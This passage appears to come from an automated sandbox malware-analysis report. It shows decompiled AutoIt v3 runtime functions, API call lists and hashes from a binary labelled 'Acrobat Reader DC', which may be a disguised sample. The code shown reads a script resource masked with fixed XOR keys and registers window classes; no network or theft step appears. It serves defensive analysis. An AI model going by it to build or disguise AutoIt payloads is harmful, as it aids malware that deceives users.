                                  				E0040BC70( &_v1596, _t109);
                                  				_t49 = E0040E4C0( &_v1596, _t109); // executed
                                  				if(_t49 != 0) {
                                  					_t96 = 0;
                                  					__eflags = 0;
                                  					_v1580 = 0;
                                  					while(1) {
                                  						_t100 =  &_v1596;
                                  						_v1600 =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  						_v1598 = 0;
                                  						__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  						if(__eflags == 0) {
                                  							goto L6;
                                  						}
                                  						L4:
                                  						_t65 = E00401C90(_t96, _t100, __eflags);
                                  						__eflags =  *_t65 - 0x3b;
                                  						if( *_t65 == 0x3b) {
                                  							goto L6;
                                  						}
                                  						E00411536( &_v1580,  &_v1600);
                                  						_t107 = _t107 + 8;
                                  						_t96 = _t96 + 1;
                                  						while(1) {
                                  							_t100 =  &_v1596;
                                  							_v1600 =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  							_v1598 = 0;
                                  							__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  							if(__eflags == 0) {
                                  								goto L6;
                                  							}
                                  							goto L4;
                                  						}
                                  						L6:
                                  						_t53 = E004111C1( &_v1580);
                                  						_t108 = _t107 + 4;
                                  						__eflags = _t53;
                                  						if(__eflags != 0) {
                                  							_t63 = E004111C1( &_v1580);
                                  							_t108 = _t108 + 4;
                                  							__eflags =  *((short*)(_t108 + 0x1e + _t63 * 2)) - 0x5c;
                                  							if(__eflags != 0) {
                                  								E00411536( &_v1580, "\\");
                                  								_t108 = _t108 + 8;
                                  							}
                                  						}
                                  						_push(0x20a);
                                  						_t54 = E004115D7(_t96, _t100, __eflags);
                                  						_t80 =  *0x4a9124; // 0x1
                                  						_t93 =  *0x4a9120; // 0xa56d30
                                  						 *((intOrPtr*)(_t93 + _t80 * 4)) = _t54;
                                  						_t55 =  *0x4a9124; // 0x1
                                  						_t94 =  *0x4a9120; // 0xa56d30
                                  						 *0x4a9124 = _t55 + 1;
                                  						E00412FBA( *((intOrPtr*)(_t94 + _t55 * 4)),  &_v1580, 0x104);
                                  						_t107 = _t108 + 0x10;
                                  						_v1580 = 0;
                                  						__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  						if(__eflags == 0) {
                                  							goto L1;
                                  						} else {
                                  							_t96 = _t96 + 1;
                                  							continue;
                                  						}
                                  					}
                                  				}
                                  				L1:
                                  				E00402250( &_v1596);
                                  				return 0x4a90e8;
                                  			}

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcsncat.LIBCMT ref: 0040E433
                                  • __wmakepath.LIBCMT ref: 0040E44F
                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • _wcscpy.LIBCMT ref: 0040E487
                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • _wcscat.LIBCMT ref: 00427541
                                  • _wcslen.LIBCMT ref: 00427551
                                  • _wcslen.LIBCMT ref: 00427562
                                  • _wcscat.LIBCMT ref: 0042757C
                                  • _wcsncpy.LIBCMT ref: 004275BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                  • String ID: Include$\
                                  • API String ID: 3173733714-3429789819
                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 88%
                                  			E004528BD(void* __eflags, signed int _a4, char _a8, intOrPtr* _a12, signed int* _a16, char _a19) {
                                  				char _v8;
                                  				signed int _v12;
                                  				short _v32;
                                  				short _v582;
                                  				short _v1104;
                                  				short _v1108;
                                  				short _v1112;
                                  				short _v1116;
                                  				short _v1120;
                                  				short _v1124;
                                  				short _v1128;
                                  				short _v1132;
                                  				short _v1136;
                                  				char _v1140;
                                  				char _v1668;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t56;
                                  				intOrPtr _t67;
                                  				intOrPtr _t68;
                                  				signed int* _t86;
                                  				intOrPtr _t87;
                                  				void* _t110;
                                  				intOrPtr* _t113;
                                  
                                  				_t86 = _a16;
                                  				_t113 = _a4;
                                  				_push(0);
                                  				_v1140 = 0;
                                  				_v1136 = 0;
                                  				_v1132 = 0;
                                  				_v1128 = 0;
                                  				_v1124 = 0;
                                  				_v1120 = 0;
                                  				_v1116 = 0;
                                  				_v1112 = 0;
                                  				_v1108 = 0;
                                  				_v32 = 0;
                                  				_v1104 = 0;
                                  				_push( *((intOrPtr*)(_t113 + 4)));
                                  				_push( *_t113);
                                  				_v582 = 0;
                                  				_v8 = 1;
                                  				E004150D1(_t86, 0, _t110, _t113, __eflags); // executed
                                  				_t56 = E00452719(__eflags, _t113, _a8,  &_v1668); // executed
                                  				if(_t56 == 0) {
                                  					E00414D04( &_a19, 1, 1,  *_t113);
                                  					E00414D04( &_a4, 4, 1,  *_t113);
                                  					_t112 = _a4 ^ 0x000087bc;
                                  					E00414D04( &_a4, 4, 1,  *_t113);
                                  					 *_t86 = _a4 ^ 0x000087bc;
                                  					E00414D04( &_a4, 4, 1,  *_t113);
                                  					_push(1);
                                  					_push(0x10);
                                  					_push( *_t113);
                                  					_v12 = _a4 ^ 0x0000a685;
                                  					E004150D1(_t86,  *_t113, _a4 ^ 0x000087bc, _t113, __eflags); // executed
                                  					_t67 = E004135BB( *_t86, _a4 ^ 0x000087bc, _t113,  *_t86); // executed
                                  					_a8 = _t67;
                                  					_t68 = E004135BB( *_t86, _a4 ^ 0x000087bc, _t113, _t112); // executed
                                  					_t87 = _t68;
                                  					E00414D04(_t87, _t112, 1,  *_t113); // executed
                                  					E0044AFEF( *((intOrPtr*)(_t113 + 8)) + 0x2477, __eflags, _t87, _t112,  *((intOrPtr*)(_t113 + 8)) + 0x2477);
                                  					E00432229( &_v8, _t87, _t112);
                                  					__eflags = _v12 - _v8;
                                  					if(_v12 == _v8) {
                                  						__eflags = _a19 - 1;
                                  						if(_a19 != 1) {
                                  							E00413748(_a8);
                                  							_a8 = _t87;
                                  						} else {
                                  							_v1132 = 0;
                                  							_v1128 = 0;
                                  							_v1124 = 0;
                                  							_v1112 = 0;
                                  							_v1108 = 0;
                                  							_v32 = 0;
                                  							_v1120 = 1;
                                  							_v1116 = 1;
                                  							_v1104 = 0;
                                  							_v582 = 0;
                                  							_v1136 = _t87;
                                  							_v1140 = _a8;
                                  							E0044B1A9(_a8, _t112,  &_v1140); // executed
                                  							E00413748(_t87); // executed
                                  						}
                                  						 *_a12 = _a8;
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						E00413748(_a8);
                                  						E00413748(_t87);
                                  						return 0xa;
                                  					}
                                  				} else {
                                  					return 6;
                                  				}
                                  			}

                                  APIs
                                  • _fseek.LIBCMT ref: 0045292B
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                  • __fread_nolock.LIBCMT ref: 00452961
                                  • __fread_nolock.LIBCMT ref: 00452971
                                  • __fread_nolock.LIBCMT ref: 0045298A
                                  • __fread_nolock.LIBCMT ref: 004529A5
                                  • _fseek.LIBCMT ref: 004529BF
                                  • _malloc.LIBCMT ref: 004529CA
                                  • _malloc.LIBCMT ref: 004529D6
                                  • __fread_nolock.LIBCMT ref: 004529E7
                                  • _free.LIBCMT ref: 00452A17
                                  • _free.LIBCMT ref: 00452A20
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                  • String ID:
                                  • API String ID: 1255752989-0
                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00410390() {
                                  				struct _WNDCLASSEXW _v52;
                                  				struct HICON__* _t18;
                                  				struct HICON__* _t19;
                                  				intOrPtr _t21;
                                  				void* _t22;
                                  				short _t23;
                                  				void* _t24;
                                  				void* _t25;
                                  				struct HICON__* _t26;
                                  				struct HICON__* _t28;
                                  				struct HICON__* _t29;
                                  				struct HBRUSH__* _t34;
                                  				int _t36;
                                  
                                  				_t34 = GetSysColorBrush(0xf);
                                  				_t26 = LoadCursorW(0, 0x7f00);
                                  				_t18 = LoadIconW( *0x497520, 0x63); // executed
                                  				 *0x4a7f40 = _t18; // executed
                                  				_t19 = LoadIconW( *0x497520, 0xa4); // executed
                                  				 *0x4a7f48 = _t19;
                                  				 *0x4a7f4c = LoadIconW( *0x497520, 0xa2);
                                  				_t21 =  *0x4a9604; // 0xa52e98
                                  				if( *((char*)(_t21 + 0x1f)) == 0) {
                                  					_t22 = E0044395E(4);
                                  					_t36 = 0;
                                  				} else {
                                  					_t36 = 0;
                                  					_t22 = LoadImageW( *0x497520, 0x63, 1, 0x10, 0x10, 0);
                                  				}
                                  				_t28 =  *0x4a7f40; // 0xc01cf
                                  				_v52.hInstance =  *0x497520;
                                  				 *0x4a7f44 = _t22;
                                  				_v52.cbSize = 0x30;
                                  				_v52.style = 0x23;
                                  				_v52.cbClsExtra = _t36;
                                  				_v52.cbWndExtra = _t36;
                                  				_v52.hCursor = _t26;
                                  				_v52.hbrBackground = _t34;
                                  				_v52.lpszMenuName = _t36;
                                  				_v52.lpszClassName = L"AutoIt v3";
                                  				_v52.hIcon = _t28;
                                  				_v52.hIconSm = _t22;
                                  				_v52.lpfnWndProc = E004010E0;
                                  				_t23 = RegisterClassExW( &_v52);
                                  				_t29 =  *0x4a7f40; // 0xc01cf
                                  				 *0x4974e4 = _t23;
                                  				_t24 =  *0x4a7f44; // 0xc006f
                                  				_t25 = E00410490(_t29, _t24); // executed
                                  				return _t25;
                                  			}

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                  • LoadImageW.USER32 ref: 0041040E
                                  • RegisterClassExW.USER32 ref: 0041045D
                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                    • Part of subcall function 00410490: RegisterClassExW.USER32 ref: 004104ED
                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00BCE420,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                  • String ID: #$0$AutoIt v3
                                  • API String ID: 423443420-4155596026
                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 82%
                                  			E00410490(intOrPtr _a4, intOrPtr _a8) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				struct _WNDCLASSEXW _v60;
                                  				struct HINSTANCE__* _t19;
                                  				void* _t25;
                                  				void* _t26;
                                  				int _t27;
                                  				struct HINSTANCE__* _t29;
                                  				void* _t31;
                                  
                                  				_t19 =  *0x497520;
                                  				 *0x4a8684 = _t19;
                                  				_v60.cbSize = 0x30;
                                  				_v60.style = 0x2b;
                                  				_v60.cbClsExtra = 0;
                                  				_v60.cbWndExtra = 0x1e;
                                  				_v60.hInstance = _t19;
                                  				_v60.hCursor = 0;
                                  				_v60.hbrBackground = GetSysColorBrush(0xf);
                                  				_v60.lpszMenuName = 0;
                                  				_v60.hIconSm = _a8;
                                  				_v60.hIcon = _a4;
                                  				_v60.lpszClassName = L"AutoIt v3 GUI";
                                  				_v60.lpfnWndProc = 0x47f08f;
                                  				 *0x4974e0 = RegisterClassExW( &_v60);
                                  				 *0x4a8688 = RegisterWindowMessageW(L"TaskbarCreated");
                                  				_v12 = 8;
                                  				_v8 = 0x13b;
                                  				__imp__InitCommonControlsEx( &_v12);
                                  				_t25 = ImageList_Create(0x10, 0x10, 0x21, 1, 1);
                                  				_t29 =  *0x4a8684; // 0x400000
                                  				 *0x4a86dc = _t25;
                                  				_t26 = LoadIconW(_t29, 0xa9);
                                  				_t31 =  *0x4a86dc; // 0xbce420
                                  				_t27 = ImageList_ReplaceIcon(_t31, 0xffffffff, _t26); // executed
                                  				 *0x4a86e0 = 0;
                                  				return _t27;
                                  			}

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                  • RegisterClassExW.USER32 ref: 004104ED
                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                  • ImageList_ReplaceIcon.COMCTL32(00BCE420,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                  • String ID: +$0$TaskbarCreated
                                  • API String ID: 2914291525-888179712
                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E0040A780(void __ecx, void* __fp0, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
                                  				char _v28;
                                  				void _v32;
                                  				char _v48;
                                  				char _v52;
                                  				intOrPtr _v56;
                                  				void* _v60;
                                  				char _v64;
                                  				char _v68;
                                  				void _v72;
                                  				char _v76;
                                  				void _v80;
                                  				char _v84;
                                  				char _v85;
                                  				void* _v92;
                                  				char _v95;
                                  				short _v96;
                                  				void _v100;
                                  				void* _v104;
                                  				void* _v108;
                                  				void _v112;
                                  				char _v115;
                                  				short _v116;
                                  				char _v119;
                                  				void* _v120;
                                  				void* _v124;
                                  				void* _v128;
                                  				void _v136;
                                  				void* _v140;
                                  				char _v148;
                                  				void* _v152;
                                  				void* _v156;
                                  				void _v160;
                                  				void __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t371;
                                  				intOrPtr _t380;
                                  				void* _t381;
                                  				void* _t382;
                                  				void** _t384;
                                  				void* _t385;
                                  				void* _t387;
                                  				void* _t388;
                                  				void* _t389;
                                  				intOrPtr _t390;
                                  				void* _t409;
                                  				void* _t411;
                                  				void* _t412;
                                  				void* _t413;
                                  				signed int _t414;
                                  				void* _t422;
                                  				void** _t427;
                                  				void* _t428;
                                  				void* _t430;
                                  				void* _t431;
                                  				void* _t438;
                                  				void* _t442;
                                  				void* _t443;
                                  				void* _t446;
                                  				void* _t448;
                                  				void* _t449;
                                  				void* _t450;
                                  				void* _t451;
                                  				signed int _t452;
                                  				void* _t459;
                                  				void _t490;
                                  				short _t491;
                                  				void* _t492;
                                  				void* _t493;
                                  				void* _t494;
                                  				void** _t495;
                                  				void* _t496;
                                  				void* _t499;
                                  				void* _t501;
                                  				void** _t502;
                                  				void* _t503;
                                  				signed int _t508;
                                  				void** _t517;
                                  				void* _t521;
                                  				void* _t525;
                                  				void* _t531;
                                  				void* _t534;
                                  				void* _t546;
                                  				void _t547;
                                  				void* _t551;
                                  				void _t554;
                                  				signed int* _t559;
                                  				void* _t563;
                                  				signed int _t572;
                                  				void* _t574;
                                  				void* _t575;
                                  				void* _t594;
                                  
                                  				_t594 = __fp0;
                                  				_t574 = (_t572 & 0xfffffff8) - 0x84;
                                  				_v112 = __ecx;
                                  				_t580 =  *0x4a9600 & 0x00000001;
                                  				if(( *0x4a9600 & 0x00000001) == 0) {
                                  					 *0x4a9600 =  *0x4a9600 | 0x00000001;
                                  					 *0x4a95f0 = 0;
                                  					 *0x4a95f8 = 1;
                                  					 *0x4a95fc = 0;
                                  					E0041130A(__eflags, 0x425c21);
                                  					_t574 = _t574 + 4;
                                  				}
                                  				_t563 = _a12;
                                  				_push(8);
                                  				_v96 = 1;
                                  				_v128 = _t563;
                                  				_v124 = 0;
                                  				_v120 = 0;
                                  				_v116 = 1;
                                  				_t371 = E004115D7(0, _t563, _t580);
                                  				_t575 = _t574 + 4;
                                  				if(_t371 == 0) {
                                  					_t371 = 0;
                                  				} else {
                                  					 *_t371 = 0x14;
                                  				}
                                  				 *((intOrPtr*)(_t371 + 4)) = 0;
                                  				_t559 = _a8;
                                  				_v100 = _t371;
                                  				_v104 = 1;
                                  				_v108 = 0x17;
                                  				_v92 = ( *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4))[2];
                                  				while(1) {
                                  					L4:
                                  					_t508 =  *_t559;
                                  					if(_t508 == _a16) {
                                  						goto L9;
                                  					}
                                  					L5:
                                  					_t380 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + _t508 * 4));
                                  					if( *((short*)(_t380 + 8)) == 0x7f) {
                                  						goto L9;
                                  					}
                                  					_t491 =  *((short*)(_t380 + 8));
                                  					if(_t491 == 0x36) {
                                  						_t492 = _v124;
                                  						_v108 = 0x16;
                                  						__eflags = _t492;
                                  						if(_t492 != 0) {
                                  							__eflags = _v115;
                                  							if(__eflags == 0) {
                                  								_push(0x18);
                                  								_t381 = E004115D7(_t559, _t563, __eflags);
                                  								_t575 = _t575 + 4;
                                  								__eflags = _t381;
                                  								if(_t381 == 0) {
                                  									_t382 = 0;
                                  								} else {
                                  									_v136 = _t381;
                                  									_t496 = _v136;
                                  									E0040B960(0x4a95f0, _t496, _t508, _t559);
                                  									_t382 = _t496;
                                  									_t492 = _v124;
                                  								}
                                  								 *((intOrPtr*)(_t382 + 0x10)) = _v120;
                                  								_v120 = _t382;
                                  							} else {
                                  								E00408E80(_v120, _t508, 0x4a95f0);
                                  								_t492 = _v128;
                                  								_v119 = 0;
                                  							}
                                  							L31:
                                  							_t384 =  *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4);
                                  							_t493 = _t492 + 1;
                                  							_v124 = _t493;
                                  							__eflags = _t493 - 1;
                                  							if(_t493 != 1) {
                                  								__eflags = _v115;
                                  								_t543 = _v120;
                                  								if(_v115 != 0) {
                                  									_v136 =  *((intOrPtr*)(_t543 + 0x10));
                                  								} else {
                                  									_v136 = _t543;
                                  								}
                                  							} else {
                                  								_v136 = _t563;
                                  							}
                                  							_t517 = _v136;
                                  							_t494 =  *_t384;
                                  							_t385 = _t517[3];
                                  							__eflags = _t385;
                                  							if(_t385 != 0) {
                                  								E004431AD(_t385);
                                  								_t517 = _v140;
                                  								_t517[3] = 0;
                                  							}
                                  							_t387 = _t517[2];
                                  							__eflags = _t387 - 8;
                                  							if(_t387 == 8) {
                                  								_t543 =  *_t517;
                                  								__eflags = _t543;
                                  								if(_t543 == 0) {
                                  									goto L35;
                                  								}
                                  								__imp__#9(_t543);
                                  								_t543 =  *_v140;
                                  								_push( *_v140);
                                  								E004111DC();
                                  								_t575 = _t575 + 4;
                                  								goto L39;
                                  							} else {
                                  								L35:
                                  								__eflags = _t387 - 0xa;
                                  								if(_t387 == 0xa) {
                                  									_t518 =  *_t517;
                                  									__eflags =  *_t517;
                                  									if(__eflags != 0) {
                                  										E0044318E(_t518);
                                  									}
                                  								} else {
                                  									__eflags = _t387 - 5;
                                  									if(_t387 == 5) {
                                  										E0040E270(_v136, _t563);
                                  									} else {
                                  										__eflags = _t387 - 0xb;
                                  										if(_t387 == 0xb) {
                                  											_t521 =  *_v136;
                                  											_t543 =  *(_t521 + 4);
                                  											_push( *(_t521 + 4));
                                  											E004111DC();
                                  											_push( *_v136);
                                  											E004111DC();
                                  											_t575 = _t575 + 8;
                                  										} else {
                                  											__eflags = _t387 - 0xc;
                                  											if(__eflags == 0) {
                                  												_t523 =  *_t517;
                                  												__eflags =  *_t517;
                                  												if(__eflags != 0) {
                                  													E0044B3D9(_t523);
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								L39:
                                  								_t388 = _v136;
                                  								_push(0x10);
                                  								 *_t388 = 0;
                                  								 *(_t388 + 8) = 4;
                                  								_t389 = E004115D7(_t559, _t563, __eflags);
                                  								_t575 = _t575 + 4;
                                  								__eflags = _t389;
                                  								if(_t389 == 0) {
                                  									_t389 = 0;
                                  								} else {
                                  									 *_t389 =  *_t494;
                                  									 *((intOrPtr*)(_t389 + 4)) =  *((intOrPtr*)(_t494 + 4));
                                  									_t543 =  *(_t494 + 8);
                                  									 *(_t389 + 8) =  *(_t494 + 8);
                                  									_t495 =  *(_t494 + 0xc);
                                  									 *(_t389 + 0xc) = _t495;
                                  									 *_t495 =  *_t495 + 1;
                                  									__eflags =  *_t495;
                                  								}
                                  								 *(_v136 + 0xc) = _t389;
                                  								_t390 = _v112;
                                  								 *_t559 = 1 +  *_t559;
                                  								__eflags =  *((char*)(_t390 + 0xfd));
                                  								if( *((char*)(_t390 + 0xfd)) != 0) {
                                  									E00457F66(_t543, __eflags, _t594, E0040D0B0( &_v128));
                                  									_t390 = _v116;
                                  								}
                                  								__eflags =  *((char*)(_t390 + 0xfe));
                                  								if( *((char*)(_t390 + 0xfe)) != 0) {
                                  									E00472F47(_v112, __eflags, _t594, _v112, E0040D0B0( &_v128));
                                  								}
                                  								while(1) {
                                  									L4:
                                  									_t508 =  *_t559;
                                  									if(_t508 == _a16) {
                                  										goto L9;
                                  									}
                                  									goto L5;
                                  								}
                                  							}
                                  						}
                                  						__eflags = _t563 - 0x4a95f0;
                                  						if(_t563 == 0x4a95f0) {
                                  							goto L31;
                                  						}
                                  						_t409 =  *(_t563 + 0xc);
                                  						__eflags = _t409;
                                  						if(_t409 != 0) {
                                  							E004431AD(_t409);
                                  							 *(_t563 + 0xc) = 0;
                                  						}
                                  						_t411 =  *(_t563 + 8);
                                  						__eflags = _t411 - 8;
                                  						if(_t411 == 8) {
                                  							_t525 =  *_t563;
                                  							__eflags = _t525;
                                  							if(_t525 == 0) {
                                  								goto L25;
                                  							}
                                  							__imp__#9(_t525);
                                  							_push( *_t563);
                                  							E004111DC();
                                  							_t575 = _t575 + 4;
                                  							goto L29;
                                  						} else {
                                  							L25:
                                  							__eflags = _t411 - 0xa;
                                  							if(_t411 == 0xa) {
                                  								_t412 =  *_t563;
                                  								__eflags = _t412;
                                  								if(_t412 != 0) {
                                  									E0044318E(_t412);
                                  								}
                                  							} else {
                                  								__eflags = _t411 - 5;
                                  								if(_t411 == 5) {
                                  									E0040E270(_t563, _t563);
                                  								} else {
                                  									__eflags = _t411 - 0xb;
                                  									if(_t411 == 0xb) {
                                  										_push( *((intOrPtr*)( *_t563 + 4)));
                                  										E004111DC();
                                  										_push( *_t563);
                                  										E004111DC();
